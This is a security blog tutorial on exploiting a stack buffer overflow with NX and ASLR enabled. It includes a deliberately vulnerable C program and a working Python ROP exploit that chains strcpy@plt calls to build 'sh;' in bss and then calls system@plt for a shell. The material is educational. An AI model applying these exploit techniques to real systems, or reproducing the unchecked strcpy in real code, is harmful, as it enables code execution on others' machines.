SpiderLabs Blog

Baby's first NX+ASLR bypass

Written by Dan Crowley | May 20, 2014 2:37:00 PM

Recently, I've been trying to improve my skills at exploiting memory corruption flaws. While I've done some work in the past exploiting basic buffer overflows, format string issues, etc., I'd only done the most basic work in bypassing a non-executable stack (NX) and ASLR.

I decided that I wanted to learn how to exploit a basic stack-based overflow when both NX and ASLR are in use. Below I explain my process and what I learned.

First, I wrote a basic binary to exploit:

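#include <stdlib.h>
#include <string.h>

int main (int argc, char **argv){
    char buf [1024];

    if(argc == 2){
        /* no bounds check: a long argv[1] overflows buf */
        strcpy(buf, argv[1]);
    }else{
        /* calling system() here gives the binary a system@plt entry */
        system("/usr/bin/false");
    }
}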

This is your basic stack-based buffer overflow. Without mitigation techniques, the classic attack unfolds something like this:

  1. Put some machine code in memory to do something that we want it to do (aka "shellcode")
  2. Figure out what its position in memory will be
  3. Overwrite the stored return address on the stack to redirect program execution to our shellcode once we reach a "ret" instruction

With NX, we can't execute shellcode stored in any of the usual places, such as in the buffer we're overflowing or in an environment variable.

To get around NX, we can use a technique called "return into libc", aka "ret2libc", which lets us use libc functions to perform the tasks we would normally perform with our shellcode. The simplest way to get a shell with ret2libc is to put the string "/bin/sh" somewhere in memory we control, such as in an environment variable, and then redirect program flow to the libc function system(), with the memory address of our "/bin/sh" string placed on the stack as its argument.
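To make the stack layout concrete, here is a minimal sketch of a ret2libc payload for 32-bit x86. The function name is made up for this example, and the two addresses passed in at the bottom are placeholders rather than values from a real process; with ASLR off you would read the real ones out of a debugger.

```python
from struct import pack

def ret2libc_payload(offset, system_addr, binsh_addr, fake_ret=0x41414141):
    """Lay out a classic 32-bit ret2libc frame (illustrative sketch)."""
    payload = b"A" * offset              # filler up to the stored return address
    payload += pack("<L", system_addr)   # overwrites the return address with system()
    payload += pack("<L", fake_ret)      # where system() would "return" to; unused here
    payload += pack("<L", binsh_addr)    # argument to system(): pointer to "/bin/sh"
    return payload

# Placeholder addresses, assumed for the example only.
example = ret2libc_payload(offset=1036, system_addr=0xb7e5f430, binsh_addr=0xbffff7a2)
```

The word between the function address and its argument matters: system() expects a return address on top of the stack when it is entered, so the argument has to sit one word further down.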

ASLR, however, prevents us from being able to know in advance where system() or our "/bin/sh" string will be, preventing us from using this method.

However, ASLR doesn't randomize everything; certain things are loaded at consistent memory addresses. We can reuse chunks of code from the original program to build the payload that we want. The technique is referred to as "return oriented programming," aka "ROP": we select chunks of code that end in a "ret" instruction and chain their addresses on the stack, so that as soon as the program finishes executing one chunk of borrowed code, it "returns" into the next. Given enough ROP "gadgets", or chunks of code usable with the ROP technique, we can achieve Turing completeness. However, given how small and simple our binary is, we don't have much to work with...

One very nice thing, however, is that we have the procedure linkage table (PLT). Given my relative inexperience in dealing with program internals, I'm still unclear on exactly why it exists. My best understanding is that it allows the program to locate library function addresses at runtime. Notably, the PLT's location is not randomized. We can call any libc function the binary uses, ret2libc style, by returning into its PLT entry instead of directly into libc. Since our binary calls system(), the PLT makes system() available to us.

So now, we return into system@PLT, but we still have a problem: How do we know where our "/bin/sh" string will be?

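Since we don't have an instance of "/bin/sh" in the binary, we can construct the string from bytes that are already there, chaining calls to strcpy to copy them one at a time into memory we can write to. Each strcpy keeps copying until it reaches a null byte, so every byte we pick drags some trailing junk along with it. For simplicity, I'll write just "sh;": the semicolon ends the shell command, so the junk trailing the final copy is treated as a separate command instead of corrupting ours. ROPgadget.py has a tool to search the binary for usable bytes; the addresses used for 's', 'h' and ';' appear in the exploit below.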
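The search itself is simple enough to sketch. The following is not ROPgadget's code, just a rough illustration of the idea; the function name, the toy byte string and the base address are all made up for the example, and it assumes the bytes being searched are mapped contiguously starting at the base.

```python
def find_byte_addresses(image, base, wanted):
    """Return, for each byte of `wanted`, the address of its first occurrence in `image`."""
    addresses = []
    for value in wanted:
        offset = image.find(bytes([value]))
        if offset < 0:
            raise ValueError("byte 0x%02x not present in image" % value)
        addresses.append(base + offset)
    return addresses

# Toy stand-in for a mapped segment; a real run would read the binary from disk.
toy_image = b"\x7fELF\x01\x01\x00libc.so.6\x00strcpy\x00;\x00sh"
toy_base = 0x08048000  # assumed load address for the toy data
addrs = find_byte_addresses(toy_image, toy_base, b"sh;")
```

In a real binary you would also want to check what follows each byte, since strcpy copies everything up to the next null.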

We also need a reliable writable address. The bss section will do for this, so we pull its address out using objdump; in this binary it sits at 0x080496cc.

For each strcpy call, we place four words on the stack: the address of strcpy@plt, the address of a pop-pop-ret ROP gadget, the destination address (bss plus the offset of the character we're writing), and the address of the bytes we're copying. On entry, strcpy finds its return address at ESP and reads its dest and src arguments from ESP+4 and ESP+8, so everything is where it expects. When strcpy returns, it pops the return address off the stack, which we've pointed at the pop-pop-ret gadget; the two pops discard dest and src, and the gadget's ret then lands on the next strcpy.
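As a small sketch, one such four-word frame could be built like this. The helper name is made up; the two constants are the strcpy@plt and pop-pop-ret addresses used in the exploit further down. The null-byte check is there because both argv and strcpy stop at the first zero byte, so a frame containing one would be cut short.

```python
from struct import pack

STRCPY_PLT = 0x08048320   # strcpy@plt in this binary
POP_POP_RET = 0x080484f7  # pop; pop; ret gadget in this binary

def strcpy_frame(dest, src):
    """Four stack words that perform strcpy(dest, src) and then move on."""
    frame = pack("<L", STRCPY_PLT)     # the preceding ret lands here
    frame += pack("<L", POP_POP_RET)   # strcpy's return address
    frame += pack("<L", dest)          # first argument (ESP+4 inside strcpy)
    frame += pack("<L", src)           # second argument (ESP+8 inside strcpy)
    if b"\x00" in frame:
        raise ValueError("frame contains a null byte and would be truncated")
    return frame

# First frame of the chain: copy the bytes starting at 's' to the start of bss.
first = strcpy_frame(0x080496cc, 0x08048142)
```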

So, our payload will look something like:

junk_to_offset +
*strcpy@plt + *pop-pop-ret + *bss + *"s<junk>" +
*strcpy@plt + *pop-pop-ret + *(bss+1) + *"h<junk>" +
*strcpy@plt + *pop-pop-ret + *(bss+2) + *";<junk>" +
*system@plt + AAAA + *bss

This will copy "sh;" byte by byte to bss, then call system@plt, pointed at our constructed "sh;" string.
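To convince myself the chain behaves that way, it helps to walk it with a toy model. The sketch below is not an emulator, just a few lines that mimic what ret, strcpy, pop-pop-ret and system do to the stack pointer. The helper names are made up, and the junk bytes placed after each source character are invented for the example; the addresses are the ones used in the exploit.

```python
STRCPY, PPR, SYSTEM = 0x08048320, 0x080484f7, 0x08048330
BSS = 0x080496cc

def load(memory, addr, data):
    """Store `data` byte by byte into the toy memory starting at `addr`."""
    for i, b in enumerate(data):
        memory[addr + i] = b

def read_cstring(memory, addr):
    """Read bytes from the toy memory up to (not including) the first null."""
    out = bytearray()
    while memory.get(addr, 0) != 0:
        out.append(memory[addr])
        addr += 1
    return bytes(out)

def run_chain(stack, memory):
    """Follow the chain word by word; return the string handed to system()."""
    sp = 0
    while True:
        target = stack[sp]      # ret: pop the next address and jump to it
        sp += 1
        if target == STRCPY:
            # stack[sp] is strcpy's return address; the arguments follow it
            dest, src = stack[sp + 1], stack[sp + 2]
            load(memory, dest, read_cstring(memory, src) + b"\x00")
        elif target == PPR:
            sp += 2             # pop; pop discards dest and src
        elif target == SYSTEM:
            return read_cstring(memory, stack[sp + 1])
        else:
            raise ValueError("unexpected address 0x%08x" % target)

memory = {}
load(memory, 0x08048142, b"s\x01\x02\x00")   # 's' plus invented junk
load(memory, 0x08048326, b"h\xff\x00")       # 'h' plus invented junk
load(memory, 0x0804852f, b";\x03\x04\x00")   # ';' plus invented junk

stack = [
    STRCPY, PPR, BSS,     0x08048142,
    STRCPY, PPR, BSS + 1, 0x08048326,
    STRCPY, PPR, BSS + 2, 0x0804852f,
    SYSTEM, 0x41414141, BSS,
]
command = run_chain(stack, memory)
```

Each copy overwrites the junk left behind by the previous one, so only the junk from the last copy survives, sitting after the semicolon.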

Here's our exploit:

#!/usr/bin/env python3

from struct import pack
from subprocess import call

junk = b'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x08048320) #strcpy@plt
ppr = pack("<L", 0x080484f7) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x080496cc) #bss
p += pack("<L", 0x08048142) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x080496cd) #bss+1
p += pack("<L", 0x08048326) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x080496ce) #bss+2
p += pack("<L", 0x0804852f) # ';'
p += pack("<L", 0x08048330) #system@plt
p += b"AAAA" #fake return address for system
p += pack("<L", 0x080496cc) #bss (now contains "sh;<junk>")

#pass the payload as argv[1]; an argument list avoids shell quoting issues
call([b"/tmp/vuln_dep2", p])

Aaaaaaand...

...shell.